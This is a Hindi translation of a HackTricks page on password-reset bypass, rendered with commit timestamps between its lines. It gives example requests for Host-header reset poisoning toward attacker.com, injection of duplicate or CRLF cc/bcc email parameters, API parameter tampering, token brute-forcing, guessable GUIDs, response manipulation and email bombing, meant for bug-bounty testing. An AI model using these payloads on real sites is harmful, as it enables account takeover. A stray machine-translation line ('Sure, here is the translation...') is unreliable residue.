2023-12-31 07:08:04 +00:00
# पासवर्ड रीसेट/भूल गए पासवर्ड बायपास
2022-04-28 16:01:33 +00:00
< details >
2023-12-31 07:08:04 +00:00
< summary > < strong > AWS हैकिंग सीखें शून्य से लेकर हीरो तक< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > के साथ!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-31 07:08:04 +00:00
HackTricks का समर्थन करने के अन्य तरीके:
2022-04-28 16:01:33 +00:00
2023-12-31 07:08:04 +00:00
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** , तो [**सब्सक्रिप्शन प्लान्स** ](https://github.com/sponsors/carlospolop ) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग** ](https://peass.creator-spring.com ) प्राप्त करें
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) की खोज करें, हमारा विशेष [**NFTs** ](https://opensea.io/collection/the-peass-family ) संग्रह
* 💬 [**Discord समूह** ](https://discord.gg/hRep4RUj7f ) में **शामिल हों** या [**telegram समूह** ](https://t.me/peass ) में या **Twitter** पर 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm ) को **फॉलो करें** .
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos** ](https://github.com/carlospolop/hacktricks ) और [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) में PRs सबमिट करके.
2022-04-28 16:01:33 +00:00
2023-12-31 07:08:04 +00:00
< / details >
2022-10-27 23:22:18 +00:00
2023-12-31 07:08:04 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2023-12-31 07:08:04 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
2023-02-27 09:28:45 +00:00
2023-12-31 07:08:04 +00:00
**हैकिंग इनसाइट्स**\
हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें
2023-02-27 09:28:45 +00:00
2023-12-31 07:08:04 +00:00
**रियल-टाइम हैक न्यूज**\
रियल-टाइम न्यूज और इनसाइट्स के माध्यम से हैकिंग की तेजी से बदलती दुनिया के साथ अपडेट रहें
2023-07-14 15:03:41 +00:00
2023-12-31 07:08:04 +00:00
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
2023-07-14 15:03:41 +00:00
2023-12-31 07:08:04 +00:00
[**Discord** ](https://discord.com/invite/N3FrSbmwdy ) पर **हमसे जुड़ें** और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
2022-10-27 23:22:18 +00:00
2023-12-31 07:08:04 +00:00
निम्नलिखित तकनीकों का संकलन [https://anugrahsr.github.io/posts/10-Password-reset-flaws/ ](https://anugrahsr.github.io/posts/10-Password-reset-flaws/ ) से लिया गया था
2020-08-24 09:12:55 +00:00
2023-11-06 08:38:02 +00:00
## पासवर्ड रीसेट टोकन रेफरर के माध्यम से लीक
2020-08-24 09:12:55 +00:00
2023-12-31 07:08:04 +00:00
**HTTP रेफरर** एक वैकल्पिक HTTP हेडर फील्ड है जो उस वेबपेज के पते की पहचान करता है जो अनुरोधित संसाधन से जुड़ा हुआ है। रेफरर अनुरोध हेडर में उस पिछले वेब पेज का पता होता है जिससे वर्तमान अनुरोधित पेज के लिए लिंक का अनुसरण किया गया था
2021-04-07 13:16:44 +00:00
![](https://www.optimizesmart.com/wp-content/uploads/2020/01/1-1-2.jpg)
2020-08-24 09:12:55 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2020-08-24 09:12:55 +00:00
2023-11-06 08:38:02 +00:00
* अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
* पासवर्ड रीसेट लिंक पर क्लिक करें
2023-12-31 07:08:04 +00:00
* पासवर्ड न बदलें
* किसी भी तृतीय पक्ष वेबसाइट्स (जैसे: Facebook, Twitter) पर क्लिक करें
* Burpsuite प्रॉक्सी में अनुरोध को इंटरसेप्ट करें
* जांचें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन लीक कर रहा है।
2020-08-24 09:12:55 +00:00
2023-11-06 08:38:02 +00:00
### प्रभाव
2020-10-07 09:34:02 +00:00
2023-12-31 07:08:04 +00:00
यह उस व्यक्ति को जो किसी विशेष साइट का नियंत्रण रखता है, उपयोगकर्ता का पासवर्ड बदलने की अनुमति देता है (CSRF हमला), क्योंकि इस व्यक्ति को उपयोगकर्ता के रीसेट पासवर्ड टोकन का पता होता है।
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### संदर्भ:
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/342693
* https://hackerone.com/reports/272379
* https://hackerone.com/reports/737042
* https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
* https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
2023-12-31 07:08:04 +00:00
## पासवर्ड रीसेट पॉइजनिंग
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
यदि आपको होस्ट हेडर हमला मिलता है और वह स्कोप से बाहर है, तो पासवर्ड रीसेट बटन की तलाश करें!
2021-04-07 10:04:56 +00:00
![](https://portswigger.net/web-security/images/password-reset-poisoning.svg)
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* Burpsuite में पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
* निम्नलिखित हेडर जोड़ें या burpsuite में हेडर को संपादित करें (एक-एक करके प्रयास करें)
2022-10-26 09:16:32 +00:00
```
2021-04-07 10:04:56 +00:00
Host: attacker.com
```
2022-10-26 09:16:32 +00:00
```
2023-11-06 08:38:02 +00:00
Host: target.com
X-Forwarded-Host: attacker.com
2021-04-07 10:04:56 +00:00
```
2022-10-26 09:16:32 +00:00
```
2023-11-06 08:38:02 +00:00
Host: target.com
Host: attacker.com
2021-04-07 10:04:56 +00:00
```
2023-12-31 07:08:04 +00:00
* जांचें कि क्या ईमेल के अंदर पासवर्ड बदलने के लिए लिंक attacker.com की ओर इशारा कर रहा है
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### पैच
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
`$_SERVER['SERVER_NAME']` का उपयोग करें `$_SERVER['HTTP_HOST']` के बजाय
2021-04-07 10:04:56 +00:00
```php
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
```
2023-11-06 08:38:02 +00:00
### प्रभाव
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
पीड़ित को उनके ईमेल में दुर्भावनापूर्ण लिंक प्राप्त होगा, और, जब क्लिक किया जाएगा, तो यह हमलावर को उपयोगकर्ता के पासवर्ड रीसेट लिंक / टोकन को लीक कर देगा, जिससे पूर्ण खाता अधिग्रहण हो सकता है।
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### संदर्भ:
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/226659
* https://hackerone.com/reports/167631
* https://www.acunetix.com/blog/articles/password-reset-poisoning/
* https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
* https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
2023-12-31 07:08:04 +00:00
## ईमेल पैरामीटर को मैनिपुलेट करके पासवर्ड रीसेट
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* & का उपयोग करके दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com& email=attacker@email.com
```
2023-12-31 07:08:04 +00:00
* हमलावर का ईमेल %20 का उपयोग करते हुए दूसरे पैरामीटर के रूप में जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
2023-12-31 07:08:04 +00:00
* हमलावर का ईमेल दूसरे पैरामीटर के रूप में | का उपयोग करके जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
2023-12-31 07:08:04 +00:00
* हमलावर का ईमेल दूसरे पैरामीटर के रूप में cc का उपयोग करके जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
2023-12-31 07:08:04 +00:00
* हमलावर का ईमेल bcc का उपयोग करते हुए दूसरे पैरामीटर के रूप में जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
2023-12-31 07:08:04 +00:00
* हमलावर का ईमेल दूसरे पैरामीटर के रूप में , का उपयोग करके जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
2023-12-31 07:08:04 +00:00
* जेसन ऐरे में दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
* https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
* https://twitter.com/HusseiN98D/status/1254888748216655872
2023-12-31 07:08:04 +00:00
## API पैरामीटर्स के माध्यम से किसी भी उपयोगकर्ता का ईमेल और पासवर्ड बदलना
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* हमलावर को अपने खाते से लॉगिन करना होगा और पासवर्ड बदलने के फंक्शन पर जाना होगा
* Burp Suite शुरू करें और अनुरोध को इंटरसेप्ट करें
* अनुरोध को इंटरसेप्ट करने के बाद इसे रिपीटर में भेजें और ईमेल और पासवर्ड पैरामीटर्स में संशोधन करें
2021-04-07 10:04:56 +00:00
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* https://medium.com/@adeshkolte/पूर्ण-खाता-अधिग्रहण-किसी-भी-उपयोगकर्ता-का-ईमेल-और-पासवर्ड-बदलना-एपीआई-पैरामीटर्स-के-माध्यम-से-3d527ab27240
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
### दर नियंत्रण की कमी: ईमेल बमबारी <a href="#5-no-rate-limiting-email-bombing" id="5-no-rate-limiting-email-bombing"></a>
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* Burp Suite शुरू करें और पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
2023-11-06 08:38:02 +00:00
* इंट्रूडर को भेजें
2023-12-31 07:08:04 +00:00
* नल पेलोड का उपयोग करें
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/280534
* https://hackerone.com/reports/794395
2023-11-06 08:38:02 +00:00
## पासवर्ड रीसेट टोकन कैसे उत्पन्न होता है यह जानें
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
पासवर्ड रीसेट टोकन के पैटर्न को समझें
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
![](https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSvCcLcUTksGbpygrJB4III5BTBYEzYQfKJyg\&usqp=CAU)
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
यदि यह
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* Timestamp के आधार पर उत्पन्न होता है
* UserID के आधार पर उत्पन्न होता है
* उपयोगकर्ता के ईमेल के आधार पर उत्पन्न होता है
* Firstname और Lastname के आधार पर उत्पन्न होता है
* जन्म तिथि के आधार पर उत्पन्न होता है
* Cryptography के आधार पर उत्पन्न होता है
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
Burp Sequencer का उपयोग करके टोकन्स की यादृच्छिकता या अनुमानितता का पता लगाएं।
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
## अनुमान लगाने योग्य GUID
2022-10-26 09:16:32 +00:00
2023-12-31 07:08:04 +00:00
GUID के विभिन्न प्रकार होते हैं:
2022-10-26 09:16:32 +00:00
2023-12-31 07:08:04 +00:00
* **संस्करण 0:** केवल nil GUID ("00000000-0000-0000-0000-000000000000") में देखा गया।
* **संस्करण 1:** GUID निम्नलिखित के आधार पर अनुमानित तरीके से उत्पन्न होता है:
* वर्तमान समय
* एक यादृच्छिक रूप से उत्पन्न "क्लॉक सीक्वेंस" जो GUIDs के उत्पादन के दौरान सिस्टम के अपटाइम के बीच स्थिर रहता है
* एक "नोड ID", जो सिस्टम के MAC पते के आधार पर उत्पन्न होती है यदि यह उपलब्ध है
* **संस्करण 3:** GUID एक प्रदान किए गए नाम और नामस्थान के MD5 हैश का उपयोग करके उत्पन्न होता है।
2023-11-06 08:38:02 +00:00
* **संस्करण 4:** GUID यादृच्छिक रूप से उत्पन्न होता है।
2023-12-31 07:08:04 +00:00
* **संस्करण 5:** GUID एक प्रदान किए गए नाम और नामस्थान के SHA1 हैश का उपयोग करके उत्पन्न होता है।
2022-10-26 09:16:32 +00:00
2023-12-31 07:08:04 +00:00
GUID के संस्करण को जानने के लिए एक छोटा उपकरण है: [**guidtool** ](https://github.com/intruder-io/guidtool )****
2022-10-26 09:16:32 +00:00
```http
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426
```
2023-12-31 07:08:04 +00:00
यदि पासवर्ड रीसेट GUID जेनरेट करने के लिए प्रयुक्त संस्करण 1 है, तो GUIDS को ब्रूटफोर्स करना संभव है:
2022-10-26 09:16:32 +00:00
```http
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2022-10-26 09:16:32 +00:00
* [https://www.intruder.io/research/in-guid-we-trust ](https://www.intruder.io/research/in-guid-we-trust )
2023-12-31 07:08:04 +00:00
## प्रतिक्रिया हेरफेर: खराब प्रतिक्रिया को अच्छे के साथ बदलें
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
इस तरह के Request और Response की तलाश करें
2021-04-07 10:04:56 +00:00
```php
HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
```
2023-12-31 07:08:04 +00:00
Sure, here is the translation for the title "Change Response" in Hindi:
2023-11-06 08:38:02 +00:00
2023-12-31 07:08:04 +00:00
```
प्रतिक्रिया बदलें
```
2021-04-07 10:04:56 +00:00
```php
HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
2023-12-31 07:08:04 +00:00
### समाप्त हो चुके टोकन का उपयोग <a href="#8-using-expired-token" id="8-using-expired-token"></a>
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* जांचें कि क्या समाप्त हो चुके टोकन का पुन: उपयोग किया जा सकता है
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
### ब्रूट फोर्स पासवर्ड रीसेट टोकन <a href="#9-brute-force-password-rest-token" id="9-brute-force-password-rest-token"></a>
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
Burpsuite का उपयोग करके रीसेट टोकन को ब्रूटफोर्स करने का प्रयास करें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com& code=$BRUTE$
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
2023-12-31 07:08:04 +00:00
### अपना टोकन इस्तेमाल करके देखें <a href="#10-try-using-your-token" id="10-try-using-your-token"></a>
2021-04-07 10:04:56 +00:00
2023-12-31 07:08:04 +00:00
* पीड़ित के खाते के साथ अपना पासवर्ड रीसेट टोकन जोड़ने का प्रयास करें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com& code=$YOUR_TOKEN$
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
2021-03-22 09:20:53 +00:00
2023-12-31 07:08:04 +00:00
## सत्र अमान्यीकरण लॉगआउट/पासवर्ड रीसेट में
2021-06-27 15:43:01 +00:00
2023-12-31 07:08:04 +00:00
जब एक उपयोगकर्ता **लॉग आउट करता है या अपना पासवर्ड रीसेट करता है** , वर्तमान सत्र को अमान्य कर देना चाहिए।\
इसलिए, उपयोगकर्ता के लॉग इन होने पर **कुकीज़ प्राप्त करें** , **लॉग आउट करें** , और **जांचें** कि क्या **कुकीज़** अभी भी **मान्य** हैं।\
लॉग आउट करने के बजाय पासवर्ड **बदलने की प्रक्रिया** दोहराएं।
2021-06-27 15:43:01 +00:00
2023-12-31 07:08:04 +00:00
## रीसेट टोकन समाप्ति समय
2021-06-27 15:43:01 +00:00
2023-12-31 07:08:04 +00:00
**रीसेट टोकन का एक समाप्ति समय होना चाहिए**, उसके बाद टोकन को उपयोगकर्ता का पासवर्ड बदलने के लिए मान्य नहीं होना चाहिए।
2021-06-27 15:43:01 +00:00
2023-12-31 07:08:04 +00:00
## अतिरिक्त जांच
2021-06-27 15:43:01 +00:00
2023-12-31 07:08:04 +00:00
* username@burp\_collab.net का उपयोग करें और कॉलबैक का विश्लेषण करें
2023-11-06 08:38:02 +00:00
* उपयोगकर्ता कार्बन कॉपी ईमेल=victim@mail.com%0a%0dcc:hacker@mail.com
2023-12-31 07:08:04 +00:00
* लंबा पासवर्ड (>200) DoS का कारण बनता है
* दूसरे ईमेल पैरामीटर और मूल्य जोड़ें
2021-06-27 15:43:01 +00:00
2023-12-31 07:08:04 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 15:03:41 +00:00
2023-12-31 07:08:04 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
2023-07-14 15:03:41 +00:00
2023-12-31 07:08:04 +00:00
**हैकिंग अंतर्दृष्टि**\
हैकिंग के रोमांच और चुनौतियों पर गहराई से विचार करने वाली सामग्री के साथ जुड़ें
2022-10-27 23:22:18 +00:00
2023-12-31 07:08:04 +00:00
**रियल-टाइम हैक समाचार**\
रियल-टाइम समाचार और अंतर्दृष्टि के माध्यम से तेजी से बदलते हैकिंग विश्व के साथ अद्यतन रहें
2022-10-27 23:22:18 +00:00
2023-12-31 07:08:04 +00:00
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज के लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
2023-02-27 09:28:45 +00:00
2023-12-31 07:08:04 +00:00
[**Discord** ](https://discord.com/invite/N3FrSbmwdy ) पर **हमसे जुड़ें** और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-12-31 07:08:04 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
HackTricks का समर्थन करने के अन्य तरीके:
2022-04-28 16:01:33 +00:00
2023-12-31 07:08:04 +00:00
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएँ** ](https://github.com/sponsors/carlospolop ) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग** ](https://peass.creator-spring.com ) प्राप्त करें
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) की खोज करें, हमारा विशेष [**NFTs** ](https://opensea.io/collection/the-peass-family ) संग्रह
* 💬 [**Discord समूह** ](https://discord.gg/hRep4RUj7f ) या [**telegram समूह** ](https://t.me/peass ) में **शामिल हों** या **Twitter** पर मुझे 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )** का अनुसरण करें।**
* **HackTricks** और [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos में PRs सबमिट करके अपनी हैकिंग तरकीबें साझा करें।
2022-04-28 16:01:33 +00:00
< / details >